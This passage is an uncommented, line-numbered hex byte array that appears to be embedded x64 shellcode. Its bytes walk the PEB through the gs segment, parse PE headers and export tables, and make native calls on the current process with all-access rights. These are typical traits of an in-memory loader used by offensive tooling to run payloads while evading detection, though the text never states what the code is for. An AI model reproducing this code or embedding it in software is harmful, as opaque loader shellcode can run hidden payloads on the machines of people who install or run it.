1341 0x54, 0x24, 0x20, 0x41, 0xb9, 0x02, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc8,
1342 0x48, 0x89, 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0xda,
1343 0x2d, 0x00, 0x00, 0x89, 0x85, 0x54, 0x04, 0x00, 0x00, 0x83, 0xbd, 0x54,
1344 0x04, 0x00, 0x00, 0x00, 0x0f, 0x88, 0xfc, 0x04, 0x00, 0x00, 0x48, 0x8b,
1345 0x85, 0x90, 0x04, 0x00, 0x00, 0x49, 0x89, 0xc1, 0x41, 0xb8, 0x00, 0x00,
1346 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc1, 0xff, 0xff,
1347 0xff, 0xff, 0xe8, 0xde, 0x2e, 0x00, 0x00, 0x89, 0x85, 0x54, 0x04, 0x00,
1348 0x00, 0x83, 0xbd, 0x54, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x88, 0xcb, 0x04,
1349 0x00, 0x00, 0x8b, 0x85, 0x80, 0x03, 0x00, 0x00, 0x89, 0x85, 0x3c, 0x04,
1350 0x00, 0x00, 0x83, 0xbd, 0x3c, 0x04, 0x00, 0x00, 0x00, 0x74, 0x68, 0x8b,
1351 0x95, 0x3c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x70, 0x48, 0x01, 0xd0,
1352 0x48, 0x89, 0x85, 0x08, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x08, 0x04,
1353 0x00, 0x00, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x89, 0x85, 0xc8, 0x04, 0x00,
1354 0x00, 0x48, 0x83, 0xbd, 0xc8, 0x04, 0x00, 0x00, 0x00, 0x74, 0x38, 0xeb,
1355 0x27, 0x48, 0x8b, 0x85, 0xc8, 0x04, 0x00, 0x00, 0x4c, 0x8b, 0x08, 0x48,
1356 0x8b, 0x45, 0x70, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xba, 0x01, 0x00,
1357 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd1, 0x48, 0x83, 0x85, 0xc8,
1358 0x04, 0x00, 0x00, 0x08, 0x48, 0x8b, 0x85, 0xc8, 0x04, 0x00, 0x00, 0x48,
1359 0x8b, 0x00, 0x48, 0x85, 0xc0, 0x75, 0xca, 0x48, 0x8b, 0x85, 0x18, 0x05,
1360 0x00, 0x00, 0x8b, 0x00, 0x83, 0xf8, 0x03, 0x0f, 0x85, 0x34, 0x02, 0x00,
1361 0x00, 0x8b, 0x85, 0xd8, 0x02, 0x00, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x45,
1362 0x70, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x00, 0x04, 0x00, 0x00, 0x48,
1363 0x8b, 0x45, 0x70, 0x4c, 0x8b, 0x8d, 0x00, 0x04, 0x00, 0x00, 0x41, 0xb8,
1364 0x00, 0x00, 0x00, 0x00, 0xba, 0x01, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1,
1365 0x41, 0xff, 0xd1, 0x48, 0x8b, 0x85, 0x18, 0x05, 0x00, 0x00, 0x0f, 0xb6,
1366 0x80, 0x0c, 0x03, 0x00, 0x00, 0x84, 0xc0, 0x0f, 0x84, 0x39, 0x03, 0x00,
1367 0x00, 0x8b, 0x85, 0x38, 0x03, 0x00, 0x00, 0x89, 0x85, 0x3c, 0x04, 0x00,
1368 0x00, 0x8b, 0x95, 0x3c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x70, 0x48,
1369 0x01, 0xd0, 0x48, 0x89, 0x85, 0xf8, 0x03, 0x00, 0x00, 0x83, 0xbd, 0x3c,
1370 0x04, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x0c, 0x03, 0x00, 0x00, 0x48, 0x8b,
1371 0x85, 0xf8, 0x03, 0x00, 0x00, 0x8b, 0x40, 0x18, 0x89, 0x85, 0xa8, 0x04,
1372 0x00, 0x00, 0x83, 0xbd, 0xa8, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x84, 0xef,
1373 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf8, 0x03, 0x00, 0x00, 0x8b, 0x40,
1374 0x1c, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x70, 0x48, 0x01, 0xd0, 0x48, 0x89,
1375 0x85, 0xf0, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf8, 0x03, 0x00, 0x00,
1376 0x8b, 0x40, 0x20, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x70, 0x48, 0x01, 0xd0,
1377 0x48, 0x89, 0x85, 0xe8, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf8, 0x03,
1378 0x00, 0x00, 0x8b, 0x40, 0x24, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x70, 0x48,
1379 0x01, 0xd0, 0x48, 0x89, 0x85, 0xe0, 0x03, 0x00, 0x00, 0x8b, 0x85, 0xa8,
1380 0x04, 0x00, 0x00, 0x83, 0xe8, 0x01, 0x89, 0xc0, 0x48, 0x8d, 0x14, 0x85,
1381 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe8, 0x03, 0x00, 0x00, 0x48,
1382 0x01, 0xd0, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x70, 0x48, 0x01,
1383 0xd0, 0x48, 0x89, 0x85, 0xd8, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x18,
1384 0x05, 0x00, 0x00, 0x48, 0x8d, 0x90, 0x0c, 0x03, 0x00, 0x00, 0x48, 0x8b,
1385 0x85, 0xd8, 0x03, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x87, 0x25, 0x00,
1386 0x00, 0x85, 0xc0, 0x75, 0x45, 0x8b, 0x85, 0xa8, 0x04, 0x00, 0x00, 0x83,
1387 0xe8, 0x01, 0x89, 0xc0, 0x48, 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x85, 0xe0,
1388 0x03, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb7, 0x00, 0x0f, 0xb7, 0xc0,
1389 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf0,
1390 0x03, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b,
1391 0x45, 0x70, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xb0, 0x04, 0x00, 0x00,
1392 0xeb, 0x14, 0x83, 0xad, 0xa8, 0x04, 0x00, 0x00, 0x01, 0x83, 0xbd, 0xa8,
1393 0x04, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x57, 0xff, 0xff, 0xff, 0x48, 0x83,
1394 0xbd, 0xb0, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x84, 0xe9, 0x01, 0x00, 0x00,
1395 0x48, 0x8b, 0x85, 0x18, 0x05, 0x00, 0x00, 0x0f, 0xb6, 0x80, 0x0c, 0x04,
1396 0x00, 0x00, 0x84, 0xc0, 0x74, 0x6f, 0x48, 0x8b, 0x85, 0x18, 0x05, 0x00,
1397 0x00, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x26, 0x48,
1398 0x8b, 0x85, 0x18, 0x05, 0x00, 0x00, 0x48, 0x05, 0x0c, 0x04, 0x00, 0x00,
1399 0x48, 0x8d, 0x95, 0xa0, 0x00, 0x00, 0x00, 0x49, 0x89, 0xd0, 0x48, 0x89,
1400 0xc2, 0x48, 0x8b, 0x8d, 0x10, 0x05, 0x00, 0x00, 0xe8, 0xd8, 0xc9, 0xff,
1401 0xff, 0x48, 0x8b, 0x85, 0x18, 0x05, 0x00, 0x00, 0x8b, 0x80, 0x0c, 0x05,
1402 0x00, 0x00, 0x85, 0xc0, 0x74, 0x09, 0x48, 0x8d, 0x85, 0xa0, 0x00, 0x00,
1403 0x00, 0xeb, 0x0d, 0x48, 0x8b, 0x85, 0x18, 0x05, 0x00, 0x00, 0x48, 0x05,
1404 0x0c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xb0, 0x04, 0x00, 0x00, 0x48,
1405 0x89, 0xc1, 0xff, 0xd2, 0xe9, 0x69, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
1406 0xb0, 0x04, 0x00, 0x00, 0x48, 0x89, 0x85, 0x98, 0x04, 0x00, 0x00, 0x48,
1407 0x8b, 0x85, 0x98, 0x04, 0x00, 0x00, 0xff, 0xd0, 0xe9, 0x4d, 0x01, 0x00,
1408 0x00, 0x48, 0x8b, 0x85, 0x18, 0x05, 0x00, 0x00, 0x0f, 0xb6, 0x80, 0x0c,
1409 0x04, 0x00, 0x00, 0x84, 0xc0, 0x74, 0x3c, 0x48, 0x8b, 0x85, 0x18, 0x05,
1410 0x00, 0x00, 0x48, 0x05, 0x0c, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x95, 0xa0,
1411 0x00, 0x00, 0x00, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d,
1412 0x10, 0x05, 0x00, 0x00, 0xe8, 0x4c, 0xc9, 0xff, 0xff, 0x48, 0x8d, 0x85,
1413 0xa0, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x10, 0x05,
1414 0x00, 0x00, 0xe8, 0x3b, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x18, 0x05,
1415 0x00, 0x00, 0x8b, 0x40, 0x04, 0x85, 0xc0, 0x0f, 0x84, 0xb5, 0x00, 0x00,
1416 0x00, 0x48, 0x8d, 0x85, 0xa8, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x90,
1417 0x04, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x58, 0x48, 0xc7, 0x44, 0x24,
1418 0x50, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x48, 0x00, 0x00,
1419 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x40, 0x00, 0x00, 0x00, 0x00, 0x48,
1420 0xc7, 0x44, 0x24, 0x38, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x30,
1421 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x00, 0x00,
1422 0x00, 0x48, 0x8b, 0x95, 0x10, 0x04, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24,
1423 0x20, 0x49, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0x41, 0xb8, 0x00, 0x00,
1424 0x00, 0x00, 0xba, 0xff, 0xff, 0x1f, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x0b,
1425 0x2b, 0x00, 0x00, 0x89, 0x85, 0x54, 0x04, 0x00, 0x00, 0x83, 0xbd, 0x54,
1426 0x04, 0x00, 0x00, 0x00, 0x78, 0x70, 0x48, 0x8b, 0x85, 0xa8, 0x02, 0x00,
1427 0x00, 0x48, 0x8b, 0x95, 0x90, 0x04, 0x00, 0x00, 0x49, 0x89, 0xd1, 0x41,
1428 0xb8, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89,
1429 0xc1, 0xe8, 0xa5, 0x29, 0x00, 0x00, 0x89, 0x85, 0x54, 0x04, 0x00, 0x00,
1430 0x83, 0xbd, 0x54, 0x04, 0x00, 0x00, 0x00, 0x79, 0x3d, 0xe9, 0xfa, 0x00,
1431 0x00, 0x00, 0xc7, 0x85, 0xc8, 0x03, 0x00, 0x00, 0x30, 0x00, 0x00, 0x00,
1432 0x8b, 0x85, 0xc8, 0x03, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x00, 0x48, 0x89,
1433 0x85, 0xc0, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x03, 0x00, 0x00,
1434 0x48, 0x8b, 0x40, 0x60, 0x48, 0x8b, 0x95, 0x10, 0x04, 0x00, 0x00, 0x48,
1435 0x89, 0xc1, 0xff, 0xd2, 0xeb, 0x04, 0x90, 0xeb, 0x01, 0x90, 0x48, 0x8b,
1436 0x45, 0x70, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xb5, 0x00, 0x00, 0x00, 0x48,
1437 0xc7, 0x45, 0x58, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0x58, 0x48,
1438 0x8d, 0x85, 0xb8, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x90, 0x04, 0x00,
1439 0x00, 0x48, 0x89, 0x54, 0x24, 0x20, 0x41, 0xb9, 0x00, 0x80, 0x00, 0x00,
1440 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff,
1441 0xff, 0xe8, 0xc1, 0x29, 0x00, 0x00, 0x89, 0x85, 0x54, 0x04, 0x00, 0x00,
1442 0x83, 0xbd, 0x54, 0x04, 0x00, 0x00, 0x00, 0x78, 0x6b, 0x48, 0x8b, 0x45,
1443 0x70, 0x48, 0x8b, 0x95, 0x90, 0x04, 0x00, 0x00, 0x49, 0x89, 0xd0, 0x48,
1444 0x89, 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x6b, 0x28,
1445 0x00, 0x00, 0x89, 0x85, 0x54, 0x04, 0x00, 0x00, 0x83, 0xbd, 0x54, 0x04,
1446 0x00, 0x00, 0x00, 0x78, 0x42, 0x48, 0x8b, 0x85, 0x80, 0x00, 0x00, 0x00,
1447 0x48, 0x8b, 0x95, 0x90, 0x04, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x9a,
1448 0x28, 0x00, 0x00, 0xeb, 0x2b, 0x90, 0xeb, 0x28, 0x90, 0xeb, 0x25, 0x90,
1449 0xeb, 0x22, 0x90, 0xeb, 0x1f, 0x90, 0xeb, 0x1c, 0x90, 0xeb, 0x19, 0x90,
1450 0xeb, 0x16, 0x90, 0xeb, 0x13, 0x90, 0xeb, 0x10, 0x90, 0xeb, 0x0d, 0x90,
1451 0xeb, 0x0a, 0x90, 0xeb, 0x07, 0x90, 0xeb, 0x04, 0x90, 0xeb, 0x01, 0x90,
1452 0x48, 0x81, 0xc4, 0x70, 0x05, 0x00, 0x00, 0x5e, 0x5f, 0x5d, 0xc3, 0x55,
1453 0x48, 0x89, 0xe5, 0x48, 0x81, 0xec, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x89,
1454 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x05,
1455 0x44, 0x04, 0x00, 0x00, 0x48, 0x89, 0x45, 0xf8, 0xc7, 0x45, 0xf4, 0x00,
1456 0x00, 0x00, 0x00, 0xeb, 0x20, 0x8b, 0x45, 0xf4, 0x48, 0x63, 0xd0, 0x48,
1457 0x8b, 0x45, 0xf8, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x10, 0x8b, 0x45, 0xf4,
1458 0x48, 0x98, 0x88, 0x94, 0x05, 0x70, 0xff, 0xff, 0xff, 0x83, 0x45, 0xf4,
1459 0x01, 0x8b, 0x45, 0xf4, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x45, 0xf8, 0x48,
1460 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x1a, 0x8b, 0x45, 0xf4,
1461 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x01, 0xd0, 0x0f, 0xb6,
1462 0x00, 0x3c, 0x3b, 0x74, 0x06, 0x83, 0x7d, 0xf4, 0x7f, 0x7e, 0xb2, 0x83,
1463 0x7d, 0xf4, 0x00, 0x74, 0x3c, 0x8b, 0x45, 0xf4, 0x48, 0x98, 0x48, 0x83,
1464 0xc0, 0x01, 0x48, 0x01, 0x45, 0xf8, 0x8b, 0x45, 0xf4, 0x48, 0x98, 0xc6,
1465 0x84, 0x05, 0x70, 0xff, 0xff, 0xff, 0x00, 0x48, 0x8b, 0x55, 0x18, 0x48,
1466 0x8d, 0x85, 0x70, 0xff, 0xff, 0xff, 0x48, 0x89, 0xc1, 0xe8, 0xba, 0x21,
1467 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x85, 0x6e, 0xff, 0xff, 0xff, 0xb8, 0x01,
1468 0x00, 0x00, 0x00, 0xeb, 0x06, 0x90, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48,
1469 0x81, 0xc4, 0xb0, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
1470 0x48, 0x83, 0xc4, 0x80, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18,
1471 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0xf8, 0x01, 0x00, 0x00, 0x48,
1472 0x89, 0x45, 0xf8, 0x48, 0x83, 0x7d, 0x18, 0x00, 0x75, 0x07, 0xb8, 0x00,
1473 0x00, 0x00, 0x00, 0xeb, 0x73, 0x48, 0x8d, 0x4d, 0xc0, 0x48, 0x8b, 0x45,
1474 0x18, 0x48, 0x8b, 0x55, 0xf8, 0x48, 0x89, 0x54, 0x24, 0x30, 0x48, 0xc7,
1475 0x44, 0x24, 0x28, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20,
1476 0x30, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc9, 0x41, 0xb8, 0x00, 0x00, 0x00,
1477 0x00, 0x48, 0x89, 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8,
1478 0x62, 0x28, 0x00, 0x00, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4, 0x00, 0x79,
1479 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x28, 0x8b, 0x45, 0xe0, 0x3d,
1480 0x00, 0x10, 0x00, 0x00, 0x75, 0x19, 0x8b, 0x45, 0xe8, 0x3d, 0x00, 0x00,
1481 0x02, 0x00, 0x75, 0x0f, 0x8b, 0x45, 0xe4, 0x83, 0xf8, 0x04, 0x75, 0x07,
1482 0xb8, 0x01, 0x00, 0x00, 0x00, 0xeb, 0x05, 0xb8, 0x00, 0x00, 0x00, 0x00,
1483 0x48, 0x83, 0xec, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0x70, 0x01,
1484 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89,
1485 0x8d, 0x00, 0x01, 0x00, 0x00, 0x48, 0x89, 0x95, 0x08, 0x01, 0x00, 0x00,
1486 0xc7, 0x85, 0xac, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45,
1487 0x3c, 0x30, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x3c, 0x65, 0x48, 0x8b, 0x00,
1488 0x48, 0x89, 0x45, 0x30, 0x48, 0x8b, 0x45, 0x30, 0x48, 0x8b, 0x40, 0x60,
1489 0x48, 0x89, 0x85, 0xa0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x00,
1490 0x00, 0x00, 0x48, 0x8b, 0x40, 0x20, 0x48, 0x89, 0x85, 0x98, 0x00, 0x00,
1491 0x00, 0x48, 0x8b, 0x85, 0x00, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x40,
1492 0x48, 0x8b, 0x95, 0x00, 0x01, 0x00, 0x00, 0x48, 0x81, 0xc2, 0x1c, 0x03,
1493 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x85, 0x90, 0x00,
1494 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x00, 0x00, 0x00, 0x48, 0x89, 0x85,
1495 0x88, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x88, 0x00, 0x00, 0x00, 0x8b,
1496 0x40, 0x3c, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x85, 0x90, 0x00, 0x00, 0x00,
1497 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8b,
1498 0x85, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x50, 0x18, 0x48, 0x8b, 0x85,
1499 0x80, 0x00, 0x00, 0x00, 0x0f, 0xb7, 0x40, 0x14, 0x0f, 0xb7, 0xc0, 0x48,
1500 0x01, 0xd0, 0x48, 0x89, 0x45, 0x78, 0xc7, 0x85, 0xec, 0x00, 0x00, 0x00,
1501 0x00, 0x00, 0x00, 0x00, 0xe9, 0x9a, 0x00, 0x00, 0x00, 0x8b, 0x95, 0xec,
1502 0x00, 0x00, 0x00, 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01,
1503 0xd0, 0x48, 0xc1, 0xe0, 0x03, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x78,
1504 0x48, 0x01, 0xd0, 0x8b, 0x10, 0x48, 0x8b, 0x85, 0x00, 0x01, 0x00, 0x00,
1505 0x48, 0x05, 0x14, 0x03, 0x00, 0x00, 0x8b, 0x00, 0x39, 0xc2, 0x75, 0x60,
1506 0x8b, 0x95, 0xec, 0x00, 0x00, 0x00, 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0,
1507 0x02, 0x48, 0x01, 0xd0, 0x48, 0xc1, 0xe0, 0x03, 0x48, 0x89, 0xc2, 0x48,
1508 0x8b, 0x45, 0x78, 0x48, 0x01, 0xd0, 0x8b, 0x40, 0x0c, 0x89, 0xc2, 0x48,
1509 0x8b, 0x85, 0x90, 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85,
1510 0xe0, 0x00, 0x00, 0x00, 0x8b, 0x95, 0xec, 0x00, 0x00, 0x00, 0x48, 0x89,
1511 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01, 0xd0, 0x48, 0xc1, 0xe0, 0x03,
1512 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x78, 0x48, 0x01, 0xd0, 0x8b, 0x40,
1513 0x08, 0xc1, 0xe8, 0x03, 0x89, 0x85, 0xe8, 0x00, 0x00, 0x00, 0xeb, 0x21,
1514 0x83, 0x85, 0xec, 0x00, 0x00, 0x00, 0x01, 0x48, 0x8b, 0x85, 0x80, 0x00,
1515 0x00, 0x00, 0x0f, 0xb7, 0x40, 0x06, 0x0f, 0xb7, 0xc0, 0x39, 0x85, 0xec,
1516 0x00, 0x00, 0x00, 0x0f, 0x82, 0x4c, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x85,
1517 0x00, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xa0, 0x00, 0x00, 0x00, 0xff,
1518 0xd0, 0x48, 0x89, 0x45, 0x70, 0xc7, 0x85, 0xec, 0x00, 0x00, 0x00, 0x00,
1519 0x00, 0x00, 0x00, 0xeb, 0x5c, 0x8b, 0x85, 0xec, 0x00, 0x00, 0x00, 0x48,
1520 0x8d, 0x14, 0xc5, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00,
1521 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xd8, 0x00, 0x00, 0x00,
1522 0x48, 0x8b, 0x85, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x08, 0x48,
1523 0x39, 0x45, 0x70, 0x75, 0x24, 0x48, 0x8b, 0x85, 0x00, 0x01, 0x00, 0x00,
1524 0x4c, 0x8b, 0x80, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x08, 0x01,
1525 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1,
1526 0x41, 0xff, 0xd0, 0xeb, 0x16, 0x90, 0x83, 0x85, 0xec, 0x00, 0x00, 0x00,
1527 0x01, 0x8b, 0x85, 0xec, 0x00, 0x00, 0x00, 0x3b, 0x85, 0xe8, 0x00, 0x00,
1528 0x00, 0x72, 0x96, 0x48, 0x8b, 0x85, 0x00, 0x01, 0x00, 0x00, 0x48, 0x8b,
1529 0x80, 0x98, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x45, 0x68, 0xc7,
1530 0x85, 0xec, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x84, 0x00,
1531 0x00, 0x00, 0x8b, 0x85, 0xec, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x14, 0xc5,
1532 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48,
1533 0x01, 0xd0, 0x48, 0x89, 0x45, 0x60, 0x48, 0x8b, 0x45, 0x60, 0x48, 0x8b,
1534 0x40, 0x08, 0x48, 0x39, 0x45, 0x68, 0x75, 0x52, 0x48, 0x8b, 0x85, 0x00,
1535 0x01, 0x00, 0x00, 0x4c, 0x8b, 0x88, 0xa8, 0x01, 0x00, 0x00, 0x48, 0x8b,
1536 0x95, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x45, 0x20, 0x41, 0xb8, 0x01,
1537 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd1, 0x8b, 0x85, 0xec,
1538 0x00, 0x00, 0x00, 0x48, 0x8d, 0x14, 0xc5, 0x00, 0x00, 0x00, 0x00, 0x48,
1539 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x0c, 0x02, 0x48, 0x8d,
1540 0x45, 0x20, 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8,
1541 0xd0, 0x1c, 0x00, 0x00, 0xeb, 0x1a, 0x90, 0x83, 0x85, 0xec, 0x00, 0x00,
1542 0x00, 0x01, 0x8b, 0x85, 0xec, 0x00, 0x00, 0x00, 0x3b, 0x85, 0xe8, 0x00,
1543 0x00, 0x00, 0x0f, 0x82, 0x6a, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x85, 0xa0,
1544 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x89, 0x45, 0x58, 0x48,
1545 0x8b, 0x45, 0x58, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x89, 0x85, 0xd0, 0x00,
1546 0x00, 0x00, 0xe9, 0x33, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x01,
1547 0x00, 0x00, 0x48, 0x05, 0x44, 0x03, 0x00, 0x00, 0x48, 0x89, 0x85, 0xb8,
1548 0x00, 0x00, 0x00, 0xc7, 0x85, 0xb0, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00,
1549 0x00, 0xc7, 0x85, 0xb4, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7,
1550 0x85, 0xec, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x66, 0x8b,
1551 0x95, 0xec, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb8, 0x00, 0x00, 0x00,
1552 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x3c, 0x77, 0x75, 0x0a, 0xc7, 0x85,
1553 0xb0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x95, 0xec, 0x00,
1554 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0,
1555 0x0f, 0xb6, 0x00, 0x3c, 0x70, 0x75, 0x0a, 0xc7, 0x85, 0xb4, 0x00, 0x00,
1556 0x00, 0x01, 0x00, 0x00, 0x00, 0x8b, 0x95, 0xec, 0x00, 0x00, 0x00, 0x48,
1557 0x8b, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x10,
1558 0x8b, 0x85, 0xec, 0x00, 0x00, 0x00, 0x88, 0x54, 0x05, 0xa0, 0x83, 0x85,
1559 0xec, 0x00, 0x00, 0x00, 0x01, 0x8b, 0x95, 0xec, 0x00, 0x00, 0x00, 0x48,
1560 0x8b, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00,
1561 0x84, 0xc0, 0x74, 0x24, 0x8b, 0x95, 0xec, 0x00, 0x00, 0x00, 0x48, 0x8b,
1562 0x85, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x3c,
1563 0x3b, 0x74, 0x0d, 0x83, 0xbd, 0xec, 0x00, 0x00, 0x00, 0x7f, 0x0f, 0x86,
1564 0x5f, 0xff, 0xff, 0xff, 0x83, 0xbd, 0xec, 0x00, 0x00, 0x00, 0x00, 0x0f,
1565 0x84, 0x3f, 0x01, 0x00, 0x00, 0x8b, 0x85, 0xec, 0x00, 0x00, 0x00, 0x83,
1566 0xc0, 0x01, 0x89, 0xc0, 0x48, 0x01, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x8b,
1567 0x85, 0xec, 0x00, 0x00, 0x00, 0xc6, 0x44, 0x05, 0xa0, 0x00, 0x48, 0x8b,
